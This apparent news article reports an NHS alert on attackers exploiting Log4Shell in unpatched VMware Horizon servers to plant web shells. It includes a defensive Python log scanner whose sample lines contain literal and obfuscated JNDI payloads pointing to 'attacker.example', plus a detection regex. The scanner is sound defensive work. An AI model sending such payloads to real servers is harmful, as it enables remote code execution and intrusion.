NHS warns of hackers targeting Log4j flaws in VMware Horizon


The UK’s National Health Service (NHS) digital security team has sounded the alarm over the active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.

“The attack likely consists of a reconnaissance phase, during which the attacker uses Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” the non-ministerial public body said in an alert. “Once a weakness has been identified, the attack then uses Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
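The reconnaissance phase described in the alert sends JNDI lookup strings to a vulnerable Horizon server, and these strings land in the server's logs. As an added example that is not part of the NHS alert or any VMware tooling, the Python below scans constructed access-log lines for such lookups, first collapsing the nested `${lower:...}`, `${upper:...}` and `${::-...}` lookups that Log4j evaluates before the JNDI lookup, so obfuscated variants are caught alongside the plain form. The log lines, IP addresses and the `attacker.example` host are all constructed sample data.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in the style of a Tomcat/Horizon access log; not real telemetry.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:09:12:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:09:12:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Jan/2022:09:12:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:ldap}://attacker.example/b}"
10.0.0.7 - - [10/Jan/2022:09:12:15 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://attacker.example/c}"
10.0.0.3 - - [10/Jan/2022:09:13:00 +0000] "GET /broker/xml HTTP/1.1" 200 80 "-" "VMware-Horizon-Client/8.2"
"""

# Simple nested lookups Log4j resolves before the outer lookup: ${lower:x}, ${upper:x}
# and ${::-x} (an empty key whose default value is x). Each resolves to the inner text.
NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)

# Once normalized, a lookup is flagged by the jndi: prefix plus the protocol and remote host.
JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested lookups repeatedly until the string stops changing.

    Each substitution strictly shortens the string, so the loop terminates."""
    prev = None
    while prev != s:
        prev = s
        s = NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


@dataclass
class Hit:
    line_no: int
    src_ip: str   # first field of the combined log format
    scheme: str   # protocol named in the lookup, lower-cased
    host: str     # remote host the lookup would have contacted


def scan(log: str) -> list[Hit]:
    """Return one Hit per log line containing a (possibly obfuscated) JNDI lookup."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append(Hit(n, line.split(" ", 1)[0], m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.src_ip} -> {h.scheme}://{h.host}")
```

Hosts reported this way are what the reconnaissance call-back would have reached, so they are the values to cross-check against egress logs and to block at the perimeter.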


The web shell, once deployed, can act as a conduit to perform a host of post-exploitation activities such as deploying additional malware, exfiltrating data, or deploying ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to Log4j vulnerabilities.


Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical remote code execution flaw in Apache Log4j 2, a ubiquitous open source logging framework, that has been exploited in various malware campaigns since it came to light in December 2021. A range of hacking groups, from state actors to ransomware cartels, have pounced on the vulnerability to date.


This development also marks the second time VMware products have been targeted over vulnerabilities in the Log4j library. Last month, researchers at AdvIntel revealed that attackers were targeting systems running VMware vCenter servers in an attempt to install Conti ransomware.

VMware, for its part, released security updates last month for Horizon, vCenter and other products impacted by Log4Shell. The virtualization provider has acknowledged scanning attempts in the wild and urged customers to install the patches where available, or to apply the temporary workarounds, to counter any potential risk.
